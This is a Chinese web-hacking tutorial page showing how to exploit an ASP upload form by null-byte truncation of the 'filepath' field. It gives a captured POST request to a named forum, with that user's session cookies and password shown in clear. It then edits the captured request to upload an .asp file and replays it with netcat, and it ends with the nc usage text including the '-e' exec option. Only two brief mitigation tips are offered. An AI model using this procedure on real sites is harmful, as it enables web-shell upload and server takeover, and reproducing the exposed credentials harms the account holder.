4 详细实例

一、wse抓包结果(存到1.txt里)：
post /bbs/upphoto/upfile.asp http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, application/vnd.ms-excel,application/vnd.ms-powerpoint, application/msword, */*
referer: _blank>http://www.xin126.com/bbs/upphoto/upload.asp
accept-language: zh-cn
content-type: multipart/form-data;
boundary=-----------7d423a138d0278
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
host: _blank>www.xin126.com
content-length: 1969
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf;
iscome=1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37;
username=szjwwwww; pass=5211314; dl=0; userid=62;
ltstyle=0; logintry=1; userpass=eb03f6c72908fd84
-----------------------------7d423a138d0278
content-disposition: form-data; name="filepath"
../medias/myphoto/
-----------------------------7d423a138d0278
... ...

上传
---------------7d423a138d0278-----------------

二、ultraedit打开1.txt改数据：
 
......

-----------------------------7d423a138d0278
content-disposition: form-data; name="filepath"
/newmm.asp <===这个黑色代表一个空格是 0x20,改成0x00就可以了
......

三、重新计算cookies长度,然后nc提交nc -vv _blank>www.xin126.com 80 <1.txt

ultraedit是一个16位编辑器网上可以下载得到我们主要用来写那个结束标致: ====>16位表示:0x00或者00h,其实你改的时候就直接再filepath的结尾处加个00就ok了,计算cookies长度===>你把fillepath改了之后、肯定是或＋或—cookies的长度变了
----------------------------
......

host: _blank>www.xin126.com
content-length: 1969 <======就是这个
connection: keep-alive
cache-control: no-cache
......
计算会吧?一个字母、数字就是1, 对于上传漏洞提出的解决思路：(仅供参考)

1、一般的上传是把上传路径作为一个变量来处理===>我们的对策就是把filepath变成常量。。。这个方法是目前最有效的(我认为的)

2、加强对于的处理,原来我们是读到这里就结束, 我们继续读直道下一个变量开始的地方，处理就ok了

附：NC Usage:

监听外部主机
nc [-options] hostname port[s] [ports] ...

监听本地主机
nc -l -p port [options] [hostname] [port]

options:

-d detach from console, stealth mode
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-g num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-l listen harder, re-listen on socket close
-n numeric-only ip addresses, no dns
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer telnet negotiation
-u udp mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-i/o mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

上一页  [1] [2]